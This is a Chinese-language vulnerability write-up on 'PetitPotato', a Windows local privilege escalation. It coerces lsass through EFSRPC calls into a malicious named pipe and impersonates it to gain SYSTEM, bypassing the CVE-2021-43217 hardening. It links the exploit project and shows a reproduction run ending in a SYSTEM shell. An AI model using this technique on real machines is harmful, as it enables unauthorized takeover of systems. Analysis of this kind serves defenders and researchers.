影响范围
Windows 21H2 10.0.20348.1547
漏洞类型
本地提权
漏洞概述
2021年12月微软发布了一个针对不同EFSRPC漏洞的补丁CVE-2021-43217,Microsoft对EFSRPC通信实施了一些强化措施,特别是在使用EFSRPC时,EFSRPC客户端需要使用RPC_C_AUTHN_LEVEL_PKT_PRIVACY,如果客户端未能做到这一点则客户端将被拒绝,并生成一个Windows应用程序事件,这里的MS-EFSR是一种用于对远程存储并通过网络访问的加密数据执行维护和管理操作的协议,该协议有一系列类似EfsRpcOpenFileRaw的API,例如:
long EfsRpcOpenFileRaw(
[in] handle_t binding_h,
[out] PEXIMPORT_CONTEXT_HANDLE* hContext,
[in, string] wchar_t* FileName,
[in] long Flags
);
这种API可以通过FileName参数指定UNC路径以打开服务器上的加密对象进行备份或恢复,当指定格式为\\\\\\\\IP\\\\C$的路径时,lsass.exe服务将使用NT AUTHORITY系统帐户权限访问\\\\\\\\IP\\\\pipe\\\\srvsvc,如果我们可以调用EfsRpcOpenFileRaw API来强制本地计算机连接到我们创建的恶意命名管道,那么我们就可以模拟命名管道客户端进程并最终获得SYSTEKM权限,但由于相关补丁的限制,使得旧的PetitPotam无法在新版本的Windows上运行,但是在调用EFS之前可以通过RpcBindingSetAuthInfoW将AuthnLevel设置为RPC_C_AUTHN_LEVEL_PKT_PRIVACY在最新的系统上有效
漏洞复现
项目地址:https://github.com/wh0amitz/PetitPotato
C:\\\\Users\\\\Administrator\\\\Desktop>PetitPotato.exe 3 cmd
[+] Malicious named pipe running on \\\\\\\\.\\\\pipe\\\\petit\\\\pipe\\\\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\\\\\\\localhost/pipe/petit\\\\C$\\\\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[+] CreateProcessAsUser OK.
Microsoft Windows [Version 10.0.20348.1547]
(c) Microsoft Corporation. All rights reserved.
C:\\\\Windows\\\\system32>whoami
nt authority\\\\system
C:\\\\Windows\\\\system32>
参考链接
https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
https://itm4n.github.io/from-rpcview-to-petitpotam/#exploring-the-efsrpc-interface-with-rpcview
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34240.html